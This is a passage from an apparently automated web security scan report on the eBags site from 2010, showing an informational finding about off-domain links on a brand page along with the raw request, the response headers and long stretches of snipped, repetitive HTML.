<a href="/products/index.cfm?ModelID=125538&productID=1325214" data-linkName="hcart-product1"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/125538_3_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=60&wid=60" border="0" width="60" height="60" alt="eBags - Mother Lode TLS Mini 21" Wheeled Duffel" /></a>
...[SNIP]...
<a href="http://www.ebags.com/shoppingcart/index.cfm?FuseAction=viewcart&CurrentTime=%7Bts%20%272010%2D12%2D26%2006%3A59%3A34%27%7D&requesttimeout=2000" data-linkName="hcart-view_cart"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/pcart_btn_vieworeditmycart.gif" border="0" /></a>
...[SNIP]...
<div class="pcartcontentleft"><img class="closeCartLink" src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/pcart_btn_continueshopping.gif" border="0" data-linkName="hcart-continue_shopping" /></div>
...[SNIP]...
<a href="http://www.ebags.com/shoppingcart/index.cfm?FuseAction=viewcart&CurrentTime=%7Bts%20%272010%2D12%2D26%2006%3A59%3A34%27%7D&requesttimeout=2000" data-linkName="hcart-begin_checkout"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/pcart_btn_begincheckout.gif" border="0" /></a></div>
</div>
<div><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/pcart_footer.png" border="0" /></div>
...[SNIP]...

4.3. http://www.ebags.com/brands/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brands/index.cfm

Issue detail

The page was loaded from a URL containing a query string:

http://www.ebags.com/brands/index.cfm?sub_site_id=49

The response contains the following links to other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewBrands.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/legend.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/spacer.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif
http://ebags.liveclicker.com/
http://images.scanalert.com/meter/survey/www.ebags.com/63.gif
http://twitter.com/eBagsOnline
http://www.ebagscorporate.com/
http://www.facebook.com/eBags
http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com
https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com

Request

GET /brands/index.cfm?sub_site_id=49 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:03:22 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822; expires=Sun, 02-Jan-2011 14:03:22 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 280162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="icon" type="image/x-icon" />
<meta http-equiv="P3P" content='policyref="http://www.ebags.com/w3c/p3p.xml"'>
...[SNIP]...
<a href="http://www.ebags.com/">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif" border=0 alt=" HOME - luggage, handbags, backpacks, bags and travel accessories">
</a>
...[SNIP]...
<a href="#" class="helpLink"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif" alt="Need Help?" /></a>
...[SNIP]...
<a href="#" id="lnkDealOfDay" title="eBags Steal of the Day - one incredible deal, every day"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif" alt="Steal of the Day" border="0"></a>
...[SNIP]...
</a>
| <a href="http://ebags.liveclicker.com" class="headerLinkStyle" title="eBags Videos - View hundreds of helpful product videos">Video</a>
...[SNIP]...
<a href="#" onclick=" window.open('/blocks/dsp_non_discountable_brands.cfm','p2','height=750,width=300,scrollbars,resizable');return false" title="An extra 10%* off + Free Shipping Over $50"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif" width=960 height="40" border=0>
</a>
...[SNIP]...
<td rowspan="2" align="right" class="right_border"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/legend.gif" border="0" hspace="10"></td>
...[SNIP]...
<td height="10" colspan="2" class="rightbottomleft_border"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/spacer.gif" border="0" height="10"></td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewBrands.gif" border="0" hspace="2">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewBrands.gif" border="0" hspace="2">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewBrands.gif" border="0" hspace="2">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewBrands.gif" border="0" hspace="2">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewBrands.gif" border="0" hspace="2">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewBrands.gif" border="0" hspace="2">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewBrands.gif" border="0" hspace="2">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
